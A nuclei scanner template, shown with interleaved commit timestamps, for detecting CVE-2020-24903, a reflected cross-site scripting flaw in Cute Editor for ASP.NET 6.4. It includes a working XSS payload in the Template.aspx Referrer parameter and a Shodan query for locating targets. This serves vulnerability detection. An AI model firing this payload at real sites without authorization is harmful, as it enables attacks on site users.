nuclei-templates/http/cves/2020/CVE-2020-24903.yaml

50 lines
1.4 KiB
YAML
Raw Normal View History

2022-09-30 15:19:39 +00:00
id: CVE-2020-24903
info:
name: Cute Editor for ASP.NET 6.4 - Cross-Site Scripting
2022-09-30 15:19:39 +00:00
author: edoardottt
severity: medium
description: |
Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-09-30 15:19:39 +00:00
reference:
- https://seclists.org/bugtraq/2016/Mar/104
- https://nvd.nist.gov/vuln/detail/CVE-2020-24903
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-09-30 15:19:39 +00:00
cve-id: CVE-2020-24903
cwe-id: CWE-79
epss-score: 0.00246
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:*
2022-09-30 15:19:39 +00:00
metadata:
max-request: 1
2022-11-15 15:12:53 +00:00
shodan-query: http.component:"ASP.NET"
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
framework: asp.net
vendor: cutesoft
product: cute_editor
2022-12-07 06:02:13 +00:00
tags: cve,cve2020,cuteeditor,xss,seclists
2022-09-30 15:19:39 +00:00
http:
2022-09-30 15:19:39 +00:00
- method: GET
path:
2022-11-15 15:12:53 +00:00
- '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script>'
2022-09-30 15:19:39 +00:00
matchers-condition: and
matchers:
- type: word
2022-11-15 15:12:53 +00:00
part: body
2022-09-30 15:19:39 +00:00
words:
2022-11-15 15:12:53 +00:00
- "<script>alert(document.domain)</script></p>"
- "System.Web"
condition: and
2022-09-30 15:19:39 +00:00
- type: word
2022-11-15 15:12:53 +00:00
part: header
2022-09-30 15:19:39 +00:00
words:
2022-11-15 15:12:53 +00:00
- text/html
- type: status
status:
- 200